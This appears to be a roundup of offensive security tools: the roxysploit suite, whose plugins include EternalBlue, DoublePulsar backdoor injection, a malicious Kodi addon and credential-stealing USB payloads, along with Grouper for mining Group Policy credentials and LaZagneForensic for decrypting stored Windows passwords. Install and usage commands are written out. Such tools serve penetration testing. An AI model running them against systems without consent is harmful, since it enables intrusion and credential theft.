python3 portSpider.py

Source: https://github.com/xdavidhu

Legal Disclamer:
The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law.

roxysploit is a community-supported, open-source and penetration testing suite that supports attacks for numerous scenarios. conducting attacks in the field.

roxysploit

Plugins in roxysploit:
+ Scan is a automated Information gathering plugin it gives the user the ability to have a rest while the best Information gathering plugin can be executed.
+ Jailpwn is a useful plugin for any iphone device that has been jailbroken it will attempt to login to the ssh using its default password giving you a full shell.
+ Eternalblue is a recent plugin we added it Exploits a vulnerability on SMBv1/SMBv2 protocols these were collected from the nsa cyberweapons.
+ Internalroute Exploits multiple vulnerabilities in routers this can become very useful such as hotel wifi’s.
+ Aurora this is a old plugin that can become very useful for pen-testers it exploits Internet Explorer 6 URL vulnerability.
+ Doublepulsar is giving you the ability to Remotely inject a malicious dll backdoor into a windows computer.
+ Kodi is a fantastic movie streaming platform but however it runs on linux we have Created a malicious addon(backdoor) via kodi.tv
+ Bleed uses a mass vulnerability check on finding any SSL Vulnerabilities.
+ Tresspass is a way of managing your php backdoor and gaining shell or even doing single commands it requires password authentication stopping any lurker.
+ Handler is commonly used to create a listener on a port.
+ Poppy is a mitm plugin allowing you to Arp spoof and sniff unencrypted passwords on all protocals such as ftp and http.
+ Redcarpet is a nice plugin keeping you safe from malicious hackers this will Encrypt a user directory.
+ Picklock is a local bruteforce plugin that you can Picklock/bruteforce Mulitple devices Pincodes such as android usb debugging.
+ Passby can load a usb to steal all credentials from a windows computer in seconds.
+ Dnsspoof is common for man in the middle attacks, it can redirect any http requests to your dns.
+ Smartremote this is more of a funny remote exploit you can Take over a smart tv’s remote control without authentication.
+ Blueborne is a recent Bluetooth memory leak all devices even cars.
+ Credswipe you have to have a card reader to clone them.
+ Rfpwn suitable device to bruteforce a special AM OOK or raw binary signal.
+ Ftpbrute Brute-force attack an ftp(file transfer protocol) server Wifijammer you can Deauth wifi networks around your area, meaning disconnecting all users connected to the network.

What operating systems support roxysploit?
– All Linux distros are currently supported

Usage:

git clone https://github.com/Eitenne/roxysploit && cd roxysploit
chmod +x install
sudo ./install
sudo rscf

Source: https://github.com/Eitenne

Grouper is a slightly wobbly PowerShell module designed for pentesters and redteamers (although probably also useful for sysadmins) which sifts through the (usually very noisy) XML output from the Get-GPOReport cmdlet and identifies all the settings defined in Group Policy Objects (GPOs) that might prove useful to someone trying to do something fun/evil.

Grouper

Examples of the kinds of stuff it finds in GPOs:
+ GPOs which grant modify permissions on the GPO itself to non-default users.
+ Startup and shutdown scripts
+-+ arguments and script themselves often include creds.
+-+ scripts are often stored with permissions that allow you to modify them.
+ MSI installers being automatically deployed
+-+ again, often stored somewhere that will grant you modify permissions.
+ Good old fashioned Group Policy Preferences passwords.
+ Autologon registry entries containing credentials.
+ Other creds being stored in the registry for fun stuff like VNC.
+ Scheduled tasks with stored credentials.
+-+ Also often run stuff from poorly secured file shares.
+ User Rights
+-+ Handy to spot where admins accidentally granted ‘Domain Users’ RDP access or those fun rights that let you run mimikatz even without full admin privs.
+ Tweaks to local file permissions
+-+ Good for finding those machines where the admins just stamped “Full Control” for “Everyone” on “C:\Program Files”.
+ File Shares
+ INI Files
+ Environment Variables
+ … and much more! (well, not very much, but some)

Yes it’s pretty rough, but it saves me an enormous amount of time reading through those awful 150MB HTML GPO reports, and if it works for me it might work for you.

Note: While some function names might include the word audit, Groper is explicitly NOT meant to be an exhaustive audit for best practice configurations etc. If you want that, you should be using Microsoft SCT and LGPO.exe or something.

TODO:
– Add explanations to each check function to provide guidance on what to look for to see if a thing is vulnerable, how to exploit vulnerable configs, etc.
– Remove reliance on RSAT/Group Policy cmdlets to generate the initial report or fold the required code into this script so it can be run on any machine with PS installed.
– Implement more checks to separate ‘could be bad’ configurations from ‘almost certainly bad’.
– Implement checks for some of the more common non-default Group Policy templates, e.g. MS Office, Citrix, etc.

Use and download:

git clone https://github.com/l0ss/Grouper && cd Grouper
Import-Module grouper.ps1

Example:
Invoke-AuditGPReport test_report.xml -showDisabled

Source: https://github.com/l0ss

Disclaimer: Do Not Use this program for illegal purposes!

LaZagne (https://github.com/AlessandroZ/LaZagne) uses an internal Windows API called CryptUnprotectData to decrypt user passwords. This API should be called on the victim user session, otherwise, it does not work. If the computer has not been started (when the analysis is realized on an offline mounted disk), or if we do not want to drop a binary on the remote host, no passwords can be retrieved.

LaZagneForensic

LaZagneForensic has been created to avoid this problem. This work has been mainly inspired by the awesome work done by Jean-Michel Picod for DPAPICK and Francesco Picasso for Windows DPAPI laboratory(https://github.com/dfirfpi/dpapilab).

Note: The main problem is that to decrypt these passwords, the user Windows passwords is needed.

Usage:

git clone https://github.com/AlessandroZ/LaZagneForensic && cd LaZagneForensic
pip install -r requirements.txt
pip install pycrypto pyzt

First way - Dump configuration files from the remote host
cd dump
Import-Module .\dump.ps1


Using the python script
python dump.py

Launch Lazagne with password if you have it
python laZagneForensic.py all -remote /tmp/dump -password 'ZapataVive'

Launch Lazagne without password
python laZagneForensic.py all -remote /tmp/dump

Source: https://github.com/AlessandroZ